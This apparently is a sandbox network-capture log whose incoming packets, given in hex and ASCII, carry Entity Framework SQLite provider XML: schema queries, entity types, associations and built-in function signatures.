2023-11-18 09:02:36 UTC	481	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 43 61 74 61 6c 6f 67 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 54 41 42 4c 45 5f 53 43 48 45 4d 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 53 63 68 65 6d 61 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 54 41 42 4c 45 5f 4e 41 4d 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 56 49 45 57 5f 44 45 46 49 4e 49 54 49 4f 4e 20 20 20 20 20 20 20 20 20 20 20 5b 56 69 65 77 44 65 66 69 6e 69 74 69 6f 6e 5d 0a 20 20 20 20 20 20 20 20 2c 20 20 20 49 53 5f 55 50 44 41 54 41 42 4c 45 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5b 49 73 55 70 64 61 74 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 Data Ascii: [CatalogName] , TABLE_SCHEMA [SchemaName] , TABLE_NAME [Name] , VIEW_DEFINITION [ViewDefinition] , IS_UPDATABLE [IsUpdatable] FROM TEMP
2023-11-18 09:02:36 UTC	485	IN	Data Raw: 41 53 45 20 5b 50 61 72 65 6e 74 49 64 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 43 4f 4e 53 54 52 41 49 4e 54 5f 4e 41 4d 45 20 5b 4e 61 6d 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 43 4f 4e 53 54 52 41 49 4e 54 5f 54 59 50 45 20 5b 43 6f 6e 73 74 72 61 69 6e 74 54 79 70 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 49 53 5f 44 45 46 45 52 52 41 42 4c 45 20 5b 49 73 44 65 66 65 72 72 61 62 6c 65 5d 0a 20 20 20 20 20 20 20 20 2c 20 74 63 2e 49 4e 49 54 49 41 4c 4c 59 5f 44 45 46 45 52 52 45 44 20 5b 49 73 49 6e 69 74 69 61 6c 6c 79 44 65 66 65 72 72 65 64 5d 0a 20 20 20 20 20 20 20 20 46 52 4f 4d 0a 20 20 20 20 20 20 20 20 54 45 4d 50 2e 53 43 48 45 4d 41 43 4f 4e 53 54 52 41 49 4e 54 53 20 74 63 0a 20 20 20 20 20 20 3c 2f 44 65 66 69 6e 69 6e Data Ascii: ASE [ParentId] , tc.CONSTRAINT_NAME [Name] , tc.CONSTRAINT_TYPE [ConstraintType] , tc.IS_DEFERRABLE [IsDeferrable] , tc.INITIALLY_DEFERRED [IsInitiallyDeferred] FROM TEMP.SCHEMACONSTRAINTS tc </Definin
2023-11-18 09:02:36 UTC	489	IN	Data Raw: 6e 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6c 75 6d 6e 22 20 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 73 22 2f 3e 0a 20 20 20 20 20 20 3c 45 6e 64 20 52 6f 6c 65 3d 22 43 6f 6c 75 6d 6e 22 20 45 6e 74 69 74 79 53 65 74 3d 22 53 56 69 65 77 43 6f 6c 75 6d 6e 73 22 2f 3e 0a 20 20 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 3e 0a 20 20 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 53 65 74 20 4e 61 6d 65 3d 22 53 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 41 73 73 6f 63 69 61 74 69 6f 6e 3d 22 53 65 6c 66 2e 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 20 3e 0a 20 20 20 20 20 20 3c Data Ascii: ns" Association="Self.ViewViewColumn" > <End Role="Parent" EntitySet="SViews"/> <End Role="Column" EntitySet="SViewColumns"/> </AssociationSet> <AssociationSet Name="SViewViewConstraints" Association="Self.ViewViewConstraint" > <
2023-11-18 09:02:36 UTC	494	IN	Data Raw: 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4e 75 6c 6c 61 62 6c 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 62 69 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 54 79 70 65 4e 61 6d 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 4d 61 78 4c 65 6e 67 74 68 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 50 72 65 63 69 73 69 6f 6e 22 20 54 79 70 65 3d 22 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 44 61 74 65 54 69 6d 65 50 72 65 63 69 73 69 6f 6e 22 Data Ascii: <Property Name="IsNullable" Nullable="false" Type="bit" /> <Property Name="TypeName" Nullable="false" Type="nvarchar" /> <Property Name="MaxLength" Type="int" /> <Property Name="Precision" Type="int" /> <Property Name="DateTimePrecision"
2023-11-18 09:02:36 UTC	498	IN	Data Raw: 54 79 70 65 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 4b 65 79 3e 0a 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 3c 2f 4b 65 79 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 64 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 6e 76 61 72 63 68 61 72 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 74 72 75 Data Ascii: Type" Nullable="false" Type="nvarchar" /> </EntityType> <EntityType Name="CheckConstraint"> <Key> <PropertyRef Name="Id" /> </Key> <Property Name="Id" Nullable="false" Type="nvarchar" /> <Property Name="Expression" Nullable="tru
2023-11-18 09:02:36 UTC	500	IN	Data Raw: 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 46 6f 72 65 69 67 6e 4b 65 79 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 43 6f 6e 73 74 72 61 69 6e 74 22 20 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 31 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 52 6f 6c 65 3d 22 46 6f 72 65 69 67 6e 4b 65 79 22 20 4d 75 6c 74 69 70 6c 69 63 69 74 79 3d 22 2a 22 20 2f 3e 0a 20 20 20 20 3c 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 Data Ascii: rentialConstraint> </Association> <Association Name="ConstraintForeignKey"> <End Type="Self.ForeignKeyConstraint" Role="Constraint" Multiplicity="1" /> <End Type="Self.ForeignKey" Role="ForeignKey" Multiplicity="*" /> <ReferentialConstrai
2023-11-18 09:02:36 UTC	503	IN	Data Raw: 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 50 72 69 6e 63 69 70 61 6c 3e 0a 20 20 20 20 20 20 3c 44 65 70 65 6e 64 65 6e 74 20 52 6f 6c 65 3d 22 50 61 72 61 6d 65 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 6f 70 65 72 74 79 52 65 66 20 4e 61 6d 65 3d 22 50 61 72 65 6e 74 49 64 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 44 65 70 65 6e 64 65 6e 74 3e 0a 20 20 20 20 3c 2f 52 65 66 65 72 65 6e 74 69 61 6c 43 6f 6e 73 74 72 61 69 6e 74 3e 0a 20 20 3c 2f 41 73 73 6f 63 69 61 74 69 6f 6e 3e 0a 0a 20 20 3c 41 73 73 6f 63 69 61 74 69 6f 6e 20 4e 61 6d 65 3d 22 56 69 65 77 56 69 65 77 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 45 6e 64 20 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 Data Ascii: <PropertyRef Name="Id" /> </Principal> <Dependent Role="Parameter"> <PropertyRef Name="ParentId" /> </Dependent> </ReferentialConstraint> </Association> <Association Name="ViewViewConstraint"> <End Type="Self.Vi
2023-11-18 09:02:36 UTC	506	IN	Data Raw: 65 3d 22 54 61 62 6c 65 43 6f 6e 73 74 72 61 69 6e 74 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6e 73 74 72 61 69 6e 74 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 54 61 62 6c 65 46 6f 72 65 69 67 6e 4b 65 79 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 46 6f 72 65 69 67 6e 4b 65 79 22 20 2f 3e 0a 20 20 20 20 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 56 69 65 77 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 56 69 65 77 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 79 53 65 74 20 4e 61 6d 65 3d 22 56 69 65 77 43 6f 6c 75 6d 6e 73 22 20 45 6e 74 69 74 79 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6c 75 6d 6e 22 20 2f 3e 0a 20 20 20 20 3c 45 6e 74 69 74 Data Ascii: e="TableConstraints" EntityType="Self.Constraint" /> <EntitySet Name="TableForeignKeys" EntityType="Self.ForeignKey" /> <EntitySet Name="Views" EntityType="Self.View" /> <EntitySet Name="ViewColumns" EntityType="Self.Column" /> <Entit
2023-11-18 09:02:36 UTC	510	IN	Data Raw: 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6c 6c 61 74 69 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 43 68 61 72 61 63 74 65 72 53 65 74 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 65 6c 66 2e 43 68 61 72 61 63 74 65 72 53 65 74 22 20 2f 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 49 73 4d 75 6c 74 69 53 65 74 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 42 6f 6f 6c 65 61 6e 22 2f 3e 0a 20 20 3c 2f 43 6f 6d 70 6c 65 78 54 79 70 65 3e 0a 0a 20 20 3c 43 6f 6d 70 6c 65 78 54 79 70 65 20 4e 61 6d 65 3d 22 43 6f 6c 6c 61 74 69 6f 6e 22 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 Data Ascii: Nullable="false" Type="Self.Collation" /> <Property Name="CharacterSet" Nullable="false" Type="Self.CharacterSet" /> <Property Name="IsMultiSet" Nullable="false" Type="Boolean"/> </ComplexType> <ComplexType Name="Collation"> <Property Na
2023-11-18 09:02:36 UTC	514	IN	Data Raw: 61 6d 65 3d 22 50 61 72 65 6e 74 22 20 46 72 6f 6d 52 6f 6c 65 3d 22 43 6f 6e 73 74 72 61 69 6e 74 22 20 54 6f 52 6f 6c 65 3d 22 50 61 72 65 6e 74 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 43 68 65 63 6b 43 6f 6e 73 74 72 61 69 6e 74 22 20 42 61 73 65 54 79 70 65 3d 22 53 65 6c 66 2e 43 6f 6e 73 74 72 61 69 6e 74 22 3e 0a 20 20 20 20 3c 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 3d 22 45 78 70 72 65 73 73 69 6f 6e 22 20 4e 75 6c 6c 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 3c 2f 45 6e 74 69 74 79 54 79 70 65 3e 0a 20 20 0a 20 20 3c 45 6e 74 69 74 79 54 79 70 65 20 4e 61 6d 65 3d 22 54 61 62 6c 65 4f 72 56 69 65 77 43 6f 6c Data Ascii: ame="Parent" FromRole="Constraint" ToRole="Parent" /> </EntityType> <EntityType Name="CheckConstraint" BaseType="Self.Constraint"> <Property Name="Expression" Nullable="false" Type="String" /> </EntityType> <EntityType Name="TableOrViewCol
2023-11-18 09:02:36 UTC	518	IN	Data Raw: 3c 54 79 70 65 20 4e 61 6d 65 3d 22 64 65 63 69 6d 61 6c 22 20 50 72 69 6d 69 74 69 76 65 54 79 70 65 4b 69 6e 64 3d 22 44 65 63 69 6d 61 6c 22 3e 0a 20 20 20 20 20 20 3c 46 61 63 65 74 44 65 73 63 72 69 70 74 69 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 50 72 65 63 69 73 69 6f 6e 20 4d 69 6e 69 6d 75 6d 3d 22 31 22 20 4d 61 78 69 6d 75 6d 3d 22 35 33 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 31 38 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 53 63 61 6c 65 20 4d 69 6e 69 6d 75 6d 3d 22 30 22 20 4d 61 78 69 6d 75 6d 3d 22 35 33 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 30 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 46 61 63 65 74 44 65 73 63 72 69 70 Data Ascii: <Type Name="decimal" PrimitiveTypeKind="Decimal"> <FacetDescriptions> <Precision Minimum="1" Maximum="53" DefaultValue="18" Constant="false" /> <Scale Minimum="0" Maximum="53" DefaultValue="0" Constant="false" /> </FacetDescrip
2023-11-18 09:02:36 UTC	520	IN	Data Raw: 74 72 69 6e 67 22 3e 0a 20 20 20 20 20 20 3c 46 61 63 65 74 44 65 73 63 72 69 70 74 69 6f 6e 73 3e 0a 20 20 20 20 20 20 20 20 3c 4d 61 78 4c 65 6e 67 74 68 20 4d 69 6e 69 6d 75 6d 3d 22 31 22 20 4d 61 78 69 6d 75 6d 3d 22 32 31 34 37 34 38 33 36 34 37 22 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 32 31 34 37 34 38 33 36 34 37 22 20 43 6f 6e 73 74 61 6e 74 3d 22 66 61 6c 73 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 55 6e 69 63 6f 64 65 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 74 72 75 65 22 20 43 6f 6e 73 74 61 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 46 69 78 65 64 4c 65 6e 67 74 68 20 44 65 66 61 75 6c 74 56 61 6c 75 65 3d 22 74 72 75 65 22 20 43 6f 6e 73 74 61 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c Data Ascii: tring"> <FacetDescriptions> <MaxLength Minimum="1" Maximum="2147483647" DefaultValue="2147483647" Constant="false" /> <Unicode DefaultValue="true" Constant="true" /> <FixedLength DefaultValue="true" Constant="true" /> <
2023-11-18 09:02:36 UTC	524	IN	Data Raw: 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 41 58 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 54 69 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 54 69 6d 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4d 41 58 22 20 41 67 67 72 65 67 61 74 65 3d 22 74 72 75 65 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 61 74 65 Data Ascii: <Function Name="MAX" Aggregate="true" BuiltIn="true"> <ReturnType Type="Time" /> <Parameter Name="arg" Type="Collection(Time)" Mode="In" /> </Function> <Function Name="MAX" Aggregate="true" BuiltIn="true"> <ReturnType Type="Date
2023-11-18 09:02:36 UTC	528	IN	Data Raw: 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 43 6f 6c 6c 65 63 74 69 6f 6e 28 44 6f 75 62 6c 65 29 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 45 4e 44 20 41 47 47 52 45 47 41 54 45 53 20 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 23 20 2d 2d 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 42 65 67 69 6e 20 53 63 61 6c 61 72 73 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 71 6c 69 74 65 2e 6f 72 67 2f 6c 61 6e 67 5f 63 6f 72 65 66 75 6e 63 2e 68 74 6d 6c 20 2d 2d 3e 0a 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d Data Ascii: uble" /> <Parameter Name="arg" Type="Collection(Double)" Mode="In" /> </Function> ... END AGGREGATES ############################################# --> ... Begin Scalars https://www.sqlite.org/lang_corefunc.html --> <Function Nam
2023-11-18 09:02:36 UTC	533	IN	Data Raw: 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 4c 54 52 49 4d 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d Data Ascii: ame="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" Mode="In" /> </Function> <Function Name="LTRIM" BuiltIn="true"> <ReturnType Type="String" /> <Parameter Name="str" Type="String" M
2023-11-18 09:02:36 UTC	534	IN	Data Raw: 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 54 61 72 67 65 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 53 65 61 72 63 68 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 72 52 65 70 6c 61 63 65 6d 65 6e 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d Data Ascii: e"> <ReturnType Type="String" /> <Parameter Name="strTarget" Type="String" Mode="In" /> <Parameter Name="strSearch" Type="String" Mode="In" /> <Parameter Name="strReplacement" Type="String" Mode="In" /> </Function> ...
2023-11-18 09:02:36 UTC	538	IN	Data Raw: 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 6e 75 6d 62 65 72 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 74 69 6d 65 22 20 54 79 70 65 3d 22 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 54 45 41 44 44 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 61 74 65 54 69 6d 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 Data Ascii: Mode="In" /> <Parameter Name="number" Type="Double" Mode="In" /> <Parameter Name="time" Type="Time" Mode="In" /> </Function> <Function Name="DATEADD" BuiltIn="true"> <ReturnType Type="DateTime" /> <Parameter Name="datepart"
2023-11-18 09:02:36 UTC	540	IN	Data Raw: 6e 20 4e 61 6d 65 3d 22 44 41 54 45 44 49 46 46 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 73 74 61 72 74 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 65 6e 64 64 61 74 65 22 20 54 79 70 65 3d 22 44 61 74 65 54 69 6d 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c Data Ascii: n Name="DATEDIFF" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="startdate" Type="String" Mode="In" /> <Parameter Name="enddate" Type="DateTime" Mode="In" /> <
2023-11-18 09:02:36 UTC	544	IN	Data Raw: 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 44 41 54 45 50 41 52 54 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 70 61 72 74 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 64 61 74 65 22 20 54 79 70 65 3d 22 53 74 72 69 6e 67 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d Data Ascii: "In" /> </Function> <Function Name="DATEPART" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="datepart" Type="String" Mode="In" /> <Parameter Name="date" Type="String" Mode="In" /> </Function> <Function Name=
2023-11-18 09:02:36 UTC	548	IN	Data Raw: 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 45 49 4c 49 4e 47 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 49 6e 74 33 32 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 43 45 49 4c 49 4e 47 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 49 6e 74 36 34 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d Data Ascii: --> <Function Name="CEILING" BuiltIn="true"> <ReturnType Type="Int32" /> <Parameter Name="arg" Type="Int32" Mode="In" /> </Function> <Function Name="CEILING" BuiltIn="true"> <ReturnType Type="Int64" /> <Parameter Nam
2023-11-18 09:02:36 UTC	550	IN	Data Raw: 6f 61 74 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 73 3a 20 66 6c 6f 61 74 20 20 20 0a 20 20 20 20 20 20 20 20 2d 2d 3e 0a 20 20 20 20 3c 46 75 6e 63 74 69 6f 6e 20 4e 61 6d 65 3d 22 45 58 50 22 20 42 75 69 6c 74 49 6e 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 20 20 3c 52 65 74 75 72 6e 54 79 70 65 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 2f 3e 0a 20 20 20 20 20 20 3c 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 3d 22 61 72 67 22 20 54 79 70 65 3d 22 44 6f 75 62 6c 65 22 20 4d 6f 64 65 3d 22 49 6e 22 20 2f 3e 0a 20 20 20 20 3c 2f 46 75 6e 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 46 4c 4f 4f 52 28 20 61 